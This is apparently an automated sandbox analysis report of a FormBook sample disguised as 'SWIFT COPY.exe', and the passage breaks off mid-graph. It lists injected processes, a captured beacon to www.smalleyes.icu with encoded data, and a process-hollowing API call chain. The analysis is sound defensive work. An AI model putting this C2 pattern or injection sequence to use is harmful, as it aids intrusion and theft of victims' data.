                                                                                            Data Raw: 49 72 3d 36 6e 6e 37 58 38 4c 48 4d 66 5a 56 4f 31 6e 53 6d 4a 67 37 7a 61 50 70 4b 39 57 31 44 58 35 45 6a 4f 78 71 63 5a 66 61 61 33 36 38 53 6b 4a 72 54 37 53 53 74 78 2f 45 43 58 74 51 6c 79 62 52 4d 47 68 4a 70 35 68 70 6c 58 33 70 4e 66 33 47 38 42 64 4b 42 66 39 4a 41 44 6d 47 74 37 56 47 35 6b 6f 6d 41 4f 2b 67 2b 4f 74 68 4e 55 47 6d 6d 4a 6b 4c 42 51 58 4c 38 52 65 79 75 4b 43 59 52 6b 36 74 57 37 72 31 66 52 73 35 44 2f 6c 59 39 54 31 37 4e 56 77 4e 67 62 7a 5a 31 2f 62 77 69 57 58 49 54 64 57 63 6f 65 4b 58 70 35 69 59 36 61 72 6b 7a 57 45 53 6b 68 43 68 32 46 4f 32 79 57 6b 42 32 48 71 77 52 32 56 41 51 30 72 73 45 37 36 6a 77 6b 68 52 75 78 58 54 6d 62 56 53 6d 42 53 36 50 37 45 6f 32 45 4b 36 42 4e 6f 53 46 34 38 62 51 2b 69 74 54 37 44 46 54 64 4b 66 30 59 4b 45 6c 49 43 6d 6d 75 62 56 59 74 79 66 48 35 37 64 56 4c 32 47 59 69 6c 52 36 32 46 4a 46 2b 48 34 48 34 49 78 79 51 31 4d 47 67 49 5a 61 66 48 67 70 52 2f 6c 54 63 54 35 38 47 7a 78 7a 53 79 33 37 5a 73 4c 64 62 66 6d 62 79 34 [TRUNCATED]
                                                                                            Data Ascii: Ir=6nn7X8LHMfZVO1nSmJg7zaPpK9W1DX5EjOxqcZfaa368SkJrT7SStx/ECXtQlybRMGhJp5hplX3pNf3G8BdKBf9JADmGt7VG5komAO+g+OthNUGmmJkLBQXL8ReyuKCYRk6tW7r1fRs5D/lY9T17NVwNgbzZ1/bwiWXITdWcoeKXp5iY6arkzWESkhCh2FO2yWkB2HqwR2VAQ0rsE76jwkhRuxXTmbVSmBS6P7Eo2EK6BNoSF48bQ+itT7DFTdKf0YKElICmmubVYtyfH57dVL2GYilR62FJF+H4H4IxyQ1MGgIZafHgpR/lTcT58GzxzSy37ZsLdbfmby4R+Fa3Y+AVnQqEnkMXI9pQRMZmiPDTRVnH4n8l7YN3whthgCNhkxw3dAbMvR3cIcxvaLmFPOqNpKB726aynZiGhhb9zKnjWrnfDShDLbQKGKQnFVgPuyU3LQ2HhpjmmE2aCkHUZUcVSXUwBHCqIQDWH24O+0STXnBDOAPACGDs6tPNXt5kIYuAJT3XzYpkqo7fpqhJ3E+Oi5R1zY8rw4N2yPfuOQui7PdvhlaWz0nfBuEytHcITl/DRkvR046sySByIU9gpX9lKN2uqeMMR97MTJvsG0kFFmXV2h/FzU9GRmb+XkZWNlfPjxPtBamtmT/rHPI57SnnwyTKkEWO36KiGAEwSzs7k11EOzUWWauDivPNO9tc8zOBN8wmYostHgJgxLSwsomowI5TpUpOXY0aVnR3zmlAwc4iM+U2RvuXE4Ly1m5ECYyMVitnEGTwqvZDSKLf0jwhxz+4jDFnt3iCxCwfltSCUEcRJTNnS4uvCb3CYKiNxHHzTS1uyPQxRfj4l1oIMksECRXPpXONC4urYPftdejCnaF/1XQEC0xhNTOyc2NvlwGUFS2bPTW2KxaVoHj93COVfAjxp2qpqsKlG0lhPsy/VB39HE+7wZIwko8dPM7ircZ0sK76RaNWccGAIUIWPTwPsMWUpHzPBp46+qaxF751aTw3S [TRUNCATED]


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.449884134.122.191.187806016C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 19, 2024 08:41:40.944854021 CET543OUTGET /s6zh/?Ir=3lPbUJ/4EMFnMU367dk2ybPqIMylLyFhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMKMrA2+vlNwKuHc+NKCv2NtQORSHn8saFjw=&M8Gl=KPotmx2p0n HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Host: www.smalleyes.icu
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:02:39:46
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Users\user\Desktop\SWIFT COPY.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\SWIFT COPY.exe"
                                                                                            Imagebase:0x750000
                                                                                            File size:986'112 bytes
                                                                                            MD5 hash:180A3E0827818592194C3A46DD8E9DD7
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:02:40:02
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Users\user\Desktop\SWIFT COPY.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\SWIFT COPY.exe"
                                                                                            Imagebase:0x750000
                                                                                            File size:986'112 bytes
                                                                                            MD5 hash:180A3E0827818592194C3A46DD8E9DD7
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2227839219.0000000001800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:02:40:28
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe"
                                                                                            Imagebase:0xe60000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3579400562.0000000002390000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:7
                                                                                            Start time:02:40:30
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\finger.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\finger.exe"
                                                                                            Imagebase:0x3c0000
                                                                                            File size:13'824 bytes
                                                                                            MD5 hash:C586D06BF5D5B3E6E9E3289F6AA8225E
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:8
                                                                                            Start time:02:40:44
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe"
                                                                                            Imagebase:0xe60000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:9
                                                                                            Start time:02:40:56
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                            Imagebase:0x7ff6bf500000
                                                                                            File size:676'768 bytes
                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:13.1%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:1.1%
                                                                                              Total number of Nodes:281
                                                                                              Total number of Limit Nodes:17
                                                                                              execution_graph 36035 99a709a 36039 99a7b89 36035->36039 36043 99a7b90 36035->36043 36036 99a70ae 36040 99a7b90 VirtualProtect 36039->36040 36042 99a7c12 36040->36042 36042->36036 36044 99a7bd8 VirtualProtect 36043->36044 36045 99a7c12 36044->36045 36045->36036 36368 4fbe218 36371 4fbe310 36368->36371 36369 4fbe227 36372 4fbe321 36371->36372 36375 4fbe344 36371->36375 36380 4fbb860 36372->36380 36375->36369 36376 4fbe33c 36376->36375 36377 4fbe548 GetModuleHandleW 36376->36377 36378 4fbe575 36377->36378 36378->36369 36382 4fbe500 GetModuleHandleW 36380->36382 36383 4fbe32c 36382->36383 36383->36375 36384 4fbe5a8 36383->36384 36385 4fbb860 GetModuleHandleW 36384->36385 36386 4fbe5bc 36385->36386 36386->36376 36046 99a6591 36047 99a6594 36046->36047 36048 99a65f9 36047->36048 36049 99a7b89 VirtualProtect 36047->36049 36050 99a7b90 VirtualProtect 36047->36050 36049->36047 36050->36047 36063 4fb7ad0 36064 4fb7ada 36063->36064 36066 4fb7c01 36063->36066 36067 4fb7c25 36066->36067 36071 4fb7d01 36067->36071 36075 4fb7d10 36067->36075 36073 4fb7d10 36071->36073 36072 4fb7e14 36072->36072 36073->36072 36079 4fb78b8 36073->36079 36076 4fb7d37 36075->36076 36077 4fb7e14 36076->36077 36078 4fb78b8 CreateActCtxA 36076->36078 36078->36077 36080 4fb8da0 CreateActCtxA 36079->36080 36082 4fb8e63 36080->36082 36387 9d4be38 36388 9d4b1e8 DrawTextExW 36387->36388 36390 9d4be77 36388->36390 36389 9d4b2a8 DrawTextExW 36393 9d4bf85 36389->36393 36390->36389 36392 9d4be7b 36390->36392 36391 9d4bfe1 36393->36391 36394 9d4c0e6 36393->36394 36395 9d4c0fb 36393->36395 36400 9d4a594 36394->36400 36397 9d4a594 CreateIconFromResourceEx 36395->36397 36399 9d4c10a 36397->36399 36402 9d4a59f 36400->36402 36401 9d4c0f1 36402->36401 36404 9d4ca40 36402->36404 36405 9d4ca4e 36404->36405 36408 9d4a5dc 36405->36408 36409 9d4cea8 CreateIconFromResourceEx 36408->36409 36410 9d4ca6a 36409->36410 36410->36401 36083 9b7421a 36084 9b74118 36083->36084 36085 9b7413d 36083->36085 36084->36085 36089 9b74b4a 36084->36089 36106 9b74ae8 36084->36106 36123 9b74af8 36084->36123 36085->36085 36090 9b74aeb 36089->36090 36092 9b74b53 36089->36092 36139 9b75705 36090->36139 36148 9b74f85 36090->36148 36153 9b75187 36090->36153 36157 9b75772 36090->36157 36162 9b754c8 36090->36162 36166 9b751ca 36090->36166 36171 9b7508c 36090->36171 36176 9b7542c 36090->36176 36180 9b7506d 36090->36180 36185 9b7530d 36090->36185 36190 9b7514f 36090->36190 36194 9b75222 36090->36194 36202 9b75822 36090->36202 36091 9b74b1a 36091->36085 36092->36085 36107 9b74a83 36106->36107 36108 9b74aeb 36106->36108 36107->36085 36110 9b75772 2 API calls 36108->36110 36111 9b75187 2 API calls 36108->36111 36112 9b74f85 2 API calls 36108->36112 36113 9b75705 4 API calls 36108->36113 36114 9b75822 2 API calls 36108->36114 36115 9b75222 4 API calls 36108->36115 36116 9b7514f 2 API calls 36108->36116 36117 9b7530d 2 API calls 36108->36117 36118 9b7506d 2 API calls 36108->36118 36119 9b7542c 2 API calls 36108->36119 36120 9b7508c 2 API calls 36108->36120 36121 9b751ca 2 API calls 36108->36121 36122 9b754c8 2 API calls 36108->36122 36109 9b74b1a 36109->36085 36110->36109 36111->36109 36112->36109 36113->36109 36114->36109 36115->36109 36116->36109 36117->36109 36118->36109 36119->36109 36120->36109 36121->36109 36122->36109 36124 9b74b12 36123->36124 36126 9b75772 2 API calls 36124->36126 36127 9b75187 2 API calls 36124->36127 36128 9b74f85 2 API calls 36124->36128 36129 9b75705 4 API calls 36124->36129 36130 9b75822 2 API calls 36124->36130 36131 9b75222 4 API calls 36124->36131 36132 9b7514f 2 API calls 36124->36132 36133 9b7530d 2 API calls 36124->36133 36134 9b7506d 2 API calls 36124->36134 36135 9b7542c 2 API calls 36124->36135 36136 9b7508c 2 API calls 36124->36136 36137 9b751ca 2 API calls 36124->36137 36138 9b754c8 2 API calls 36124->36138 36125 9b74b1a 36125->36085 36126->36125 36127->36125 36128->36125 36129->36125 36130->36125 36131->36125 36132->36125 36133->36125 36134->36125 36135->36125 36136->36125 36137->36125 36138->36125 36140 9b75712 36139->36140 36215 9b75c92 36140->36215 36221 9b75ca0 36140->36221 36141 9b75950 36141->36091 36142 9b75088 36142->36141 36207 9b72fb1 36142->36207 36211 9b72fb8 36142->36211 36143 9b750b8 36143->36091 36143->36143 36149 9b74f8f 36148->36149 36234 9b73ced 36149->36234 36238 9b73cf8 36149->36238 36242 9b73630 36153->36242 36246 9b73638 36153->36246 36154 9b751ab 36154->36091 36158 9b759c9 36157->36158 36250 9b73570 36158->36250 36254 9b73578 36158->36254 36159 9b759e7 36164 9b73630 WriteProcessMemory 36162->36164 36165 9b73638 WriteProcessMemory 36162->36165 36163 9b754f6 36163->36091 36164->36163 36165->36163 36167 9b751d0 36166->36167 36168 9b758cf 36167->36168 36169 9b73630 WriteProcessMemory 36167->36169 36170 9b73638 WriteProcessMemory 36167->36170 36169->36167 36170->36167 36172 9b75092 36171->36172 36174 9b72fb1 ResumeThread 36172->36174 36175 9b72fb8 ResumeThread 36172->36175 36173 9b750b8 36173->36091 36173->36173 36174->36173 36175->36173 36177 9b75166 36176->36177 36258 9b73721 36177->36258 36262 9b73728 36177->36262 36181 9b75077 36180->36181 36183 9b72fb1 ResumeThread 36181->36183 36184 9b72fb8 ResumeThread 36181->36184 36182 9b750b8 36182->36091 36182->36182 36183->36182 36184->36182 36186 9b75567 36185->36186 36188 9b73061 Wow64SetThreadContext 36186->36188 36189 9b73068 Wow64SetThreadContext 36186->36189 36187 9b75059 36188->36187 36189->36187 36191 9b75155 36190->36191 36192 9b73721 ReadProcessMemory 36191->36192 36193 9b73728 ReadProcessMemory 36191->36193 36192->36191 36193->36191 36195 9b7523d 36194->36195 36196 9b75088 36194->36196 36200 9b75c92 2 API calls 36195->36200 36201 9b75ca0 2 API calls 36195->36201 36197 9b750b8 36196->36197 36198 9b72fb1 ResumeThread 36196->36198 36199 9b72fb8 ResumeThread 36196->36199 36197->36091 36198->36197 36199->36197 36200->36196 36201->36196 36204 9b751e1 36202->36204 36203 9b758cf 36204->36202 36204->36203 36205 9b73630 WriteProcessMemory 36204->36205 36206 9b73638 WriteProcessMemory 36204->36206 36205->36204 36206->36204 36208 9b72ff8 ResumeThread 36207->36208 36210 9b73029 36208->36210 36210->36143 36212 9b72ff8 ResumeThread 36211->36212 36214 9b73029 36212->36214 36214->36143 36216 9b75c9b 36215->36216 36218 9b75beb 36215->36218 36226 9b73061 36216->36226 36230 9b73068 36216->36230 36217 9b75ccb 36217->36142 36218->36142 36222 9b75cb5 36221->36222 36224 9b73061 Wow64SetThreadContext 36222->36224 36225 9b73068 Wow64SetThreadContext 36222->36225 36223 9b75ccb 36223->36142 36224->36223 36225->36223 36227 9b730ad Wow64SetThreadContext 36226->36227 36229 9b730f5 36227->36229 36229->36217 36231 9b730ad Wow64SetThreadContext 36230->36231 36233 9b730f5 36231->36233 36233->36217 36235 9b73d81 CreateProcessA 36234->36235 36237 9b73f43 36235->36237 36237->36237 36239 9b73d81 CreateProcessA 36238->36239 36241 9b73f43 36239->36241 36243 9b73680 WriteProcessMemory 36242->36243 36245 9b736d7 36243->36245 36245->36154 36247 9b73680 WriteProcessMemory 36246->36247 36249 9b736d7 36247->36249 36249->36154 36251 9b735b8 VirtualAllocEx 36250->36251 36253 9b735f5 36251->36253 36253->36159 36255 9b735b8 VirtualAllocEx 36254->36255 36257 9b735f5 36255->36257 36257->36159 36259 9b73773 ReadProcessMemory 36258->36259 36261 9b737b7 36259->36261 36261->36177 36263 9b73773 ReadProcessMemory 36262->36263 36265 9b737b7 36263->36265 36265->36177 36270 9b75ee0 36271 9b75f06 36270->36271 36272 9b7606b 36270->36272 36271->36272 36274 9b7059c 36271->36274 36275 9b76160 PostMessageW 36274->36275 36276 9b761cc 36275->36276 36276->36271 36277 9d46c08 36278 9d46c27 36277->36278 36281 9d46c40 36277->36281 36286 9d46c30 36277->36286 36282 9d46c49 36281->36282 36291 9d46c88 36282->36291 36297 9d46c78 36282->36297 36283 9d46c6e 36283->36278 36287 9d46c49 36286->36287 36289 9d46c88 DrawTextExW 36287->36289 36290 9d46c78 DrawTextExW 36287->36290 36288 9d46c6e 36288->36278 36289->36288 36290->36288 36292 9d46cc3 36291->36292 36293 9d46cb2 36291->36293 36294 9d46d51 36292->36294 36303 9d473b0 36292->36303 36308 9d473a0 36292->36308 36293->36283 36294->36283 36298 9d46cc3 36297->36298 36299 9d46cb2 36297->36299 36300 9d46d51 36298->36300 36301 9d473b0 DrawTextExW 36298->36301 36302 9d473a0 DrawTextExW 36298->36302 36299->36283 36300->36283 36301->36299 36302->36299 36304 9d473d8 36303->36304 36305 9d474de 36304->36305 36313 9d4ad80 36304->36313 36318 9d4ad71 36304->36318 36305->36293 36309 9d473b1 36308->36309 36310 9d474de 36309->36310 36311 9d4ad80 DrawTextExW 36309->36311 36312 9d4ad71 DrawTextExW 36309->36312 36310->36293 36311->36310 36312->36310 36314 9d4ad96 36313->36314 36323 9d4b1d8 36314->36323 36327 9d4b1e8 36314->36327 36315 9d4ae0c 36315->36305 36319 9d4ad80 36318->36319 36321 9d4b1d8 DrawTextExW 36319->36321 36322 9d4b1e8 DrawTextExW 36319->36322 36320 9d4ae0c 36320->36305 36321->36320 36322->36320 36331 9d4b218 36323->36331 36336 9d4b228 36323->36336 36324 9d4b206 36324->36315 36328 9d4b206 36327->36328 36329 9d4b218 DrawTextExW 36327->36329 36330 9d4b228 DrawTextExW 36327->36330 36328->36315 36329->36328 36330->36328 36332 9d4b259 36331->36332 36333 9d4b286 36332->36333 36341 9d4b298 36332->36341 36346 9d4b2a8 36332->36346 36333->36324 36337 9d4b259 36336->36337 36338 9d4b286 36337->36338 36339 9d4b298 DrawTextExW 36337->36339 36340 9d4b2a8 DrawTextExW 36337->36340 36338->36324 36339->36338 36340->36338 36343 9d4b2a8 36341->36343 36342 9d4b2de 36342->36333 36343->36342 36351 9d4a448 36343->36351 36345 9d4b339 36348 9d4b2c9 36346->36348 36347 9d4b2de 36347->36333 36348->36347 36349 9d4a448 DrawTextExW 36348->36349 36350 9d4b339 36349->36350 36353 9d4a453 36351->36353 36352 9d4b6c9 36352->36345 36353->36352 36357 9d4bd20 36353->36357 36360 9d4bd0f 36353->36360 36354 9d4b7db 36354->36345 36364 9d4a56c 36357->36364 36361 9d4bd20 36360->36361 36362 9d4a56c DrawTextExW 36361->36362 36363 9d4bd3d 36362->36363 36363->36354 36365 9d4bd58 DrawTextExW 36364->36365 36367 9d4bd3d 36365->36367 36367->36354 36059 99a5884 36061 99a7b89 VirtualProtect 36059->36061 36062 99a7b90 VirtualProtect 36059->36062 36060 99a58b5 36061->36060 36062->36060
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (otq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4|yq$4|yq$$tq
                                                                                              • API String ID: 0-1537292367
                                                                                              • Opcode ID: 8e4a168586e6de5c94960c3fb0be49bda9d4fd9f56a24bfc3a72a313e6732f57
                                                                                              • Instruction ID: 3fb0a2db4d7419a319b2ef7559cbed0e38d61b591d9e40e1c2012e3b8ebc60da
                                                                                              • Opcode Fuzzy Hash: 8e4a168586e6de5c94960c3fb0be49bda9d4fd9f56a24bfc3a72a313e6732f57
                                                                                              • Instruction Fuzzy Hash: 11634074A44219CFCB28DF68C884A9DB7B2FF89310F158599E919AB761CB34ED81CF50

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1247 9d4a594-9d4c150 1250 9d4c156-9d4c15b 1247->1250 1251 9d4c633-9d4c69c 1247->1251 1250->1251 1252 9d4c161-9d4c17e 1250->1252 1259 9d4c6a3-9d4c72b 1251->1259 1258 9d4c184-9d4c188 1252->1258 1252->1259 1260 9d4c197-9d4c19b 1258->1260 1261 9d4c18a-9d4c194 call 9d4a5a4 1258->1261 1303 9d4c736-9d4c7b6 1259->1303 1262 9d4c19d-9d4c1a7 call 9d4a5a4 1260->1262 1263 9d4c1aa-9d4c1b1 1260->1263 1261->1260 1262->1263 1268 9d4c1b7-9d4c1e7 1263->1268 1269 9d4c2cc-9d4c2d1 1263->1269 1280 9d4c9b6-9d4c9dc 1268->1280 1282 9d4c1ed-9d4c2c0 call 9d4a5b0 * 2 1268->1282 1272 9d4c2d3-9d4c2d7 1269->1272 1273 9d4c2d9-9d4c2de 1269->1273 1272->1273 1276 9d4c2e0-9d4c2e4 1272->1276 1277 9d4c2f0-9d4c320 call 9d4a5bc * 3 1273->1277 1276->1280 1281 9d4c2ea-9d4c2ed 1276->1281 1277->1303 1304 9d4c326-9d4c329 1277->1304 1296 9d4c9ec 1280->1296 1297 9d4c9de-9d4c9ea 1280->1297 1281->1277 1282->1269 1312 9d4c2c2 1282->1312 1301 9d4c9ef-9d4c9f4 1296->1301 1297->1301 1320 9d4c7bd-9d4c83f 1303->1320 1304->1303 1307 9d4c32f-9d4c331 1304->1307 1307->1303 1311 9d4c337-9d4c36c 1307->1311 1319 9d4c372-9d4c37b 1311->1319 1311->1320 1312->1269 1321 9d4c381-9d4c3db call 9d4a5bc * 2 call 9d4a5cc * 2 1319->1321 1322 9d4c4de-9d4c4e2 1319->1322 1325 9d4c847-9d4c8c9 1320->1325 1368 9d4c3ed 1321->1368 1369 9d4c3dd-9d4c3e6 1321->1369 1322->1325 1326 9d4c4e8-9d4c4ec 1322->1326 1330 9d4c8d1-9d4c8fe 1325->1330 1326->1330 1331 9d4c4f2-9d4c4f8 1326->1331 1346 9d4c905-9d4c985 1330->1346 1334 9d4c4fc-9d4c531 1331->1334 1335 9d4c4fa 1331->1335 1340 9d4c538-9d4c53e 1334->1340 1335->1340 1345 9d4c544-9d4c54c 1340->1345 1340->1346 1350 9d4c553-9d4c555 1345->1350 1351 9d4c54e-9d4c552 1345->1351 1403 9d4c98c-9d4c9ae 1346->1403 1357 9d4c5b7-9d4c5bd 1350->1357 1358 9d4c557-9d4c57b 1350->1358 1351->1350 1359 9d4c5dc-9d4c60a 1357->1359 1360 9d4c5bf-9d4c5da 1357->1360 1386 9d4c584-9d4c588 1358->1386 1387 9d4c57d-9d4c582 1358->1387 1380 9d4c612-9d4c61e 1359->1380 1360->1380 1372 9d4c3f1-9d4c3f3 1368->1372 1369->1372 1375 9d4c3e8-9d4c3eb 1369->1375 1376 9d4c3f5 1372->1376 1377 9d4c3fa-9d4c3fe 1372->1377 1375->1372 1376->1377 1384 9d4c400-9d4c407 1377->1384 1385 9d4c40c-9d4c412 1377->1385 1402 9d4c624-9d4c630 1380->1402 1380->1403 1389 9d4c4a9-9d4c4ad 1384->1389 1392 9d4c414-9d4c41a 1385->1392 1393 9d4c41c-9d4c421 1385->1393 1386->1280 1396 9d4c58e-9d4c591 1386->1396 1391 9d4c594-9d4c5a7 call 9d4ca40 1387->1391 1398 9d4c4cc-9d4c4d8 1389->1398 1399 9d4c4af-9d4c4c9 1389->1399 1405 9d4c5ad-9d4c5b5 1391->1405 1400 9d4c427-9d4c42d 1392->1400 1393->1400 1396->1391 1398->1321 1398->1322 1399->1398 1408 9d4c433-9d4c438 1400->1408 1409 9d4c42f-9d4c431 1400->1409 1403->1280 1405->1380 1413 9d4c43a-9d4c44c 1408->1413 1409->1413 1414 9d4c456-9d4c45b 1413->1414 1415 9d4c44e-9d4c454 1413->1415 1420 9d4c461-9d4c468 1414->1420 1415->1420 1424 9d4c46e 1420->1424 1425 9d4c46a-9d4c46c 1420->1425 1428 9d4c473-9d4c47e 1424->1428 1425->1428 1429 9d4c480-9d4c483 1428->1429 1430 9d4c4a2 1428->1430 1429->1389 1432 9d4c485-9d4c48b 1429->1432 1430->1389 1433 9d4c492-9d4c49b 1432->1433 1434 9d4c48d-9d4c490 1432->1434 1433->1389 1436 9d4c49d-9d4c4a0 1433->1436 1434->1430 1434->1433 1436->1389 1436->1430
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hxq$Hxq$Hxq$Hxq$Hxq
                                                                                              • API String ID: 0-615405233
                                                                                              • Opcode ID: e89ffbfac4062101a1dba54554198ced8e80fb5b134ca7828837d6b7e8a75bee
                                                                                              • Instruction ID: 5b33e952994731cdf978dc6dc58cd0ad3dff715ce435c3c4d5f6bbff3ee4c7cf
                                                                                              • Opcode Fuzzy Hash: e89ffbfac4062101a1dba54554198ced8e80fb5b134ca7828837d6b7e8a75bee
                                                                                              • Instruction Fuzzy Hash: 40329F70A102588FDB58DFB9C8507AEBBF2BF88300F14856AD449AB795DB349C45CFA1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1623 99a2be0-99a2be6 1624 99a2c38-99a2d1d 1623->1624 1625 99a2be8-99a2bea 1623->1625 1636 99a2d1f 1624->1636 1637 99a2d24-99a2d60 1624->1637 1625->1624 1636->1637 1704 99a2d62 call 99a32b0 1637->1704 1705 99a2d62 call 99a32a0 1637->1705 1639 99a2d68 1640 99a2d6f-99a2d8b 1639->1640 1641 99a2d8d 1640->1641 1642 99a2d94-99a2d95 1640->1642 1641->1639 1643 99a2d9a-99a2d9e 1641->1643 1644 99a30eb-99a30f2 1641->1644 1645 99a2ddb-99a2de4 1641->1645 1646 99a307b-99a30a0 1641->1646 1647 99a2fbd-99a2fc1 1641->1647 1648 99a2e7d-99a2e9b 1641->1648 1649 99a2f73-99a2f88 1641->1649 1650 99a2e10-99a2e28 1641->1650 1651 99a2eca-99a2eea 1641->1651 1652 99a2f2b-99a2f42 1641->1652 1653 99a2eef-99a2f01 1641->1653 1654 99a30cf-99a30e6 1641->1654 1655 99a2f8d-99a2f91 1641->1655 1656 99a2fed-99a2ff9 1641->1656 1657 99a2ea0-99a2eac 1641->1657 1658 99a2f61-99a2f6e 1641->1658 1659 99a2f06-99a2f26 1641->1659 1660 99a2e66-99a2e78 1641->1660 1661 99a2f47-99a2f5c 1641->1661 1662 99a2dc7-99a2dd9 1641->1662 1663 99a30a5-99a30b1 1641->1663 1642->1643 1642->1644 1666 99a2da0-99a2daf 1643->1666 1667 99a2db1-99a2db8 1643->1667 1668 99a2de6-99a2df5 1645->1668 1669 99a2df7-99a2dfe 1645->1669 1646->1640 1676 99a2fc3-99a2fd2 1647->1676 1677 99a2fd4-99a2fdb 1647->1677 1648->1640 1649->1640 1672 99a2e2a 1650->1672 1673 99a2e2f-99a2e45 1650->1673 1651->1640 1652->1640 1653->1640 1654->1640 1674 99a2f93-99a2fa2 1655->1674 1675 